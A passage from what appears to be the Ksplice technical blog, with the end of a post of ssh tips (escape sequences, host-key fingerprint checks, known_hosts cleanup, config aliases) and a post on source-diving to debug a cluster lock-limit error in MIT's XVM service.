~. (a tilde followed by a period) will terminate the ssh connection, which is handy if you lose your network connection and don't want to wait for your ssh session to time out.  ~^Z (a tilde followed by Ctrl-Z) will put the connection in the background, in case you want to do something else on the host while ssh is running. An example of this in action:

wdaher@rocksteady:~$ ssh bebop
wdaher@bebop:~$ sleep 10000
wdaher@bebop:~$ ~^Z [suspend ssh]

[1]+  Stopped                 ssh bebop
wdaher@rocksteady:~$ # Do something else
wdaher@rocksteady:~$ fg # and you're back!

(4) Dusting for prints

I'm sure you've seen this a million times, and you probably just type "yes" without thinking twice:

wdaher@rocksteady:~$ ssh bebop
The authenticity of host 'bebop (192.168.1.106)' can't be established.
RSA key fingerprint is a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68.
Are you sure you want to continue connecting (yes/no)?

What's actually going on here? Well, if this is your first time connecting to bebop, you can't really tell whether the machine you're talking to is actually bebop, or just an impostor pretending to be bebop. All you know is the key fingerprint of the system you're talking to.  In principle, you're supposed to verify this out-of-band (i.e. call up the remote host and ask them to read off the fingerprint.)

Let's say you and your incredibly security-minded friend actually want to do this. How does one actually find this fingerprint? On the remote host, have your friend run:

sbaker@bebop:~$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68 /etc/ssh/ssh_host_rsa_key.pub (RSA)

Tada! They match, and it's safe to proceed. From now on, this is stored in your list of ssh "known hosts" (in ~/.ssh/known_hosts), so you don't get the prompt every time. And if the key ever changes on the other end, you'll get an alert--someone's trying to read your traffic! (Or your friend reinstalled their system and didn't preserve the key.)

(5) Losing your keys

Unfortunately, some time later, you and your friend have a falling out (something about Kirk vs. Picard), and you want to remove their key from your known hosts. "No problem," you think, "I'll just remove it from my list of known hosts." You open up the file and are unpleasantly surprised: a jumbled file full of all kinds of indecipherable characters. They're actually hashes of the hostnames (or IP addresses) that you've connected to before, and their associated keys.

Before you proceed, surely you're asking yourself: "Why would anyone be so cruel? Why not just list the hostnames in plain text, so that humans could easily edit the file?" In fact, that's actually how it was done until very recently. But it turns out that leaving them in the clear is a potential security risk, since it provides an attacker a convenient list of other places you've connected (places where, e.g., an unwitting user might have used the same password).

Fortunately, ssh-keygen -R <hostname> does the trick:

wdaher@rocksteady:~$ ssh-keygen -R bebop
/home/wdaher/.ssh/known_hosts updated.
Original contents retained as /home/wdaher/.ssh/known_hosts.old

I'm told there's still no easy way to remove now-bitter memories of your friendship together, though.

(6) A connection by any other name...

If you've read this far, you're an ssh pro. And like any ssh pro, you log into a bajillion systems, each with their own usernames, ports, and long hostnames. Like your accounts at AWS, Rackspace Cloud, your dedicated server, and your friend's home system.

And you already know how to do this. username@host or -l username to specify your username, and -p portnumber to specify the port:

wdaher@rocksteady:~$ ssh -p 2222 bob.example.com
wdaher@rocksteady:~$ ssh -p 8183 waseem@alice.example.com
wdaher@rocksteady:~$ ssh -p 31337 -l waseemio wsd.example.com

But this gets really old really quickly, especially when you need to pass a slew of other options for each of these connections. Enter .ssh/config, a file where you specify convenient aliases for each of these sets of settings:

Host bob
    HostName bob.example.com
    Port 2222
    User wdaher

Host alice
    HostName alice.example.com
    Port 8183
    User waseem

Host self
    HostName wsd.example.com
    Port 31337
    User waseemio

So now it's as simple as:

wdaher@rocksteady:~$ ssh bob
wdaher@rocksteady:~$ ssh alice
wdaher@rocksteady:~$ ssh self
And yes, the config file lets you specify port forwards or commands to run as well, if you'd like--check out the ssh_config manual page for the details.

ssh! It's (not) a secret

This list is by no means exhaustive, so I turn to you: what other ssh tips and tricks have you learned over the years? Leave ’em in the comments!

~wdaher

Monday Jul 12, 2010

Source diving for sysadmins

As a system administrator, I work with dozens of large systems every day--Apache, MySQL, Postfix, Dovecot, and the list goes on from there. While I have a good idea of how to configure all of these pieces of software, I'm not intimately familiar with all of their code bases. And every so often, I'll run into a problem which I can't configure around.

When I'm lucky, I can reproduce the bug in a testing environment. I can then drop in arbitrary print statements, recompile with debugging flags, or otherwise modify my application to give me useful data. But all too often, I find that either the bug vanishes when it's not in my production environment, or it would simply take too much time or resources to even set up a testing deployment. When this happens, I find myself left with no alternative but to sift through the source code of the failing system, hoping to find clues as to the cause of the bug of the day. Doing so is never painless, but over time I've developed a set of techniques to make the source diving experience as focused and productive and possible.

To illustrate these techniques, I'll walk you through a real-world debugging experience I had a few weeks ago. I am a maintainer of the XVM project, an MIT-internal VPS service. We keep the disks of our virtual servers in shared storage, and we use clustering software to coordinate changes to the disks.

For a long time, we had happily run a cluster of four nodes. After receiving a grant for new hardware, we attempted to increase the size of our cluster from four nodes to eight nodes. But once we added the new nodes to the cluster, disaster struck. With five or more nodes in the cluster, no matter what we tried, we received the same error message:

root@babylon-four:~# lvs
 cluster request failed: Cannot allocate memory
 Can't get lock for xenvg
 Skipping volume group xenvg
 cluster request failed: Cannot allocate memory
 Can't get lock for babylon-four

And to make matters even more exciting, by the time we observed the problem, users had already booted enough virtual servers that we did not have the RAM to go back to four nodes. So there we were, with a broken cluster to debug.

Tip 1: Check the likely causes of failure first.

It can be quite tempting to believe that a given problem is caused by a bug in someone else's code rather than your own error in configuration. In reality, the common bugs in large, widely-used projects have already been squashed, meaning the most likely cause of error is something that you are doing wrong. I've lost track of the number of times I was sure I encountered a bug in some software, only to later discover that I had forgotten to set a configuration variable. So when you encounter a failure of some kind, make sure that your environment is not obviously at fault. Check your configuration files, check resource usage, check log files.

In the case of XVM, after seeing memory errors, we naturally figured we were out of memory--but free -m showed plenty of spare RAM. Thinking a rogue process might be to blame, we ran ps aux and top, but no process was consuming abnormal amounts of RAM or CPU. We consulted man pages, we scoured the relevant configuration files in /etc, and we even emailed the clustering software's user list, trying to determine if we were doing something wrong. Our efforts failed to uncover any problems on our end.

Tip 2: Gather as much debugging output as you can. You're going to need it.

Once you're sure you actually need to do a source dive, you should make sure you have all the information you can get about what your program is doing wrong. See if your program has a "debugging" or "verbosity" level you can turn up. Check /var/log/ for dedicated log files for the software under consideration, or perhaps check a standard log such as syslog. If your program does not provide enough output on its own, try using strace -p to dump the system calls it's issuing.

Before doing our clustering-software source dive, we cranked debugging as high as it would go to get the following output:

Got new connection on fd 5
Read on local socket 5, len = 28
creating pipe, [9, 10]
Creating pre&post thread
in sub thread: client = 0x69f010
Sub thread ready for work.
doing PRE command LOCK_VG 'V_xenvg' at 1 (client=0x69f010)
lock_resource 'V_xenvg-1', flags=0, mode=1
Created pre&post thread, state = 0
Writing status 12 down pipe 10
Waiting for next pre command
read on PIPE 9: 4 bytes: status: 12
background routine status was 12, sock_client=0x69f010
Send local reply

Note that this spew does not contain an obvious error message. Still, it had enough information for us to ultimately track down and fix the problem that beset us.

Tip 3: Use the right tools for the job

Perhaps the worst part of living in a world with many debugging tools is that it's easy to waste time using the wrong ones. If you are seeing a segmentation fault or an apparent deadlock, then your first instinct should be to reach for gdb. gdb has all sorts of nifty capabilities, including the ability to attach to an already-running process. But if you don't have an obvious crash site, often the information you glean from dynamic debugging is too narrow or voluminous to be helpful. Some, such as Linus Torvalds, have even vehemently opposed debuggers in general.

Sometimes the simplest tools are the best: together grep and find can help you navigate an entire codebase knowing only fragments of text or filenames (or guesses thereof). It can also be helpful to use a language-specific tool. For C, I recommend cscope, a tool which lets you find symbol usages or definitions.

XVM's clustering problem was with a multiprocess network-based program, and we had no idea where the failure was originating. Both properties would have made the use of a dynamic debugger quite onerous. Thus we elected to dive into the source code using nothing but our familiar command-line utilities.

Tip 4: Know your error.

Examine your system's failure mode. Is it printing an error message? If so, where is that error message originating? What can possibly cause that error? If you don't understand the symptoms of a failure, you certainly won't be able to diagnose its cause.

Often, grep as you might, you won't find the text of the error message in the codebase under consideration. Rather, a standard UNIX error-reporting mechanism is to internally set the global variable errno, which is converted to a string using strerror.

Here's a Python script that I've found useful for converting the output of strerror to the corresponding symbolic error name. (Just pass the script any substring of your error as an argument.)

#!/usr/bin/env python
import errno, os, sys
msg = ' '.join(sys.argv[1:]).lower()
for i in xrange(256):
    err = os.strerror(i)
    if msg in err.lower():
        print '%s [errno %d]: %s' % (errno.errorcode.get(i, '(unknown)'), i, err)

This script shows that the "Cannot allocate memory" message we had seen was caused by errno being set to the code ENOMEM.

Tip 5: Map lines of output to lines of code.

You can learn a lot about the state of a program by determining which lines of code it is executing. First, fetch the source code for the version of the software you are running (generally one of apt-get source and yumdownloader --source). Using your handy command-line tools, you should then be able to trace lines of debugging output back to the lines of code that emitted them. You can thus determine a set of lines that are definitively being executed.

Returning to the XVM example, we used apt-get source to fetch the relevant source code and dpkg -l to verify we were running the same version. We then ran a grep for each line of debugging output we had obtained. One such invocation, grep -r "lock_resource '.*'" .,

showed that the corresponding log entry was emitted by a line in the middle of a function entitled _lock_resource.

Tip 6: Be systematic.

If you've followed the preceding tips, you'll know what parts of the code the program is executing and how it's erroring out. From there, you should work systematically, eliminating parts of the code that you can prove are not contributing to your error. Be sure you have actual evidence for your conclusions--the existence of a bug indicates that the program is in an unexpected state, and thus the core assumptions of the code may be violated.

At this point in the XVM debugging, we examined the _lock_resource function. After the debugging message we had in our logs, all paths of control flow except one printed a message we had not seen. That path terminated with an error from a function called saLckResourceLock. Hence we had found the source of our error.

We also noticed that _lock_resource transforms error values returned by the function it calls using using ais_to_errno. Reading the body of ais_to_errno, we noted it just maps internal error values to standard UNIX error codes. So instead of ENOMEM, the real culprit was one of SA_AIS_ERR_NO_MEMORY, SA_AIS_ERR_NO_RESOURCES, or SA_AIS_ERR_NO_SECTIONS. This certainly explained why we could see this error message even on machines with tens of gigabytes of free memory!

Ultimately, our debugging process brought us to the following block of code:

if (global_lock_count == LCK_MAX_NUM_LOCKS)     {
error = SA_AIS_ERR_NO_RESOURCES;
goto error_exit;
}

This chunk of code felt exactly right. It was bound by some hard-coded limit (namely, LCK_MAX_NUM_LOCKS, the maximum number of locks) and hitting it returned one of the error codes we were seeking. We bumped the value of the constant and have been running smoothly ever since.

Tip 7: Make sure you really fixed it.

How many times have you been certain you finally found an elusive bug, spent hours recompiling and redeploying, and then found that the bug was actually still there? Or even better, the bug simply changed when it appears, and you failed to find this out before telling everyone that you fixed it?

It's important that after squashing a bug, you examine, test, and sanity-check your changes. Perhaps explain your reasoning to someone else. It's all too easy to "fix" code that isn't broken, only cover a subset of the relevant cases, or introduce a new bug in your patch.

After bumping the value of LCK_MAX_NUM_LOCKS, we checked the project's changelog. We found a commit increasing the maximum number of locks without any changes to code, so our patch seemed safe. We explained our reasoning and findings to the other project developers, quietly deployed our patched version, and then after a week of stability sent an announce email proclaiming that we had fixed the cluster.

Your turn

What techniques have you found useful for debugging unfamiliar code?

~gdb

About

Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.

Search

Archives
« April 2014
SunMonTueWedThuFriSat
  
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
   
       
Today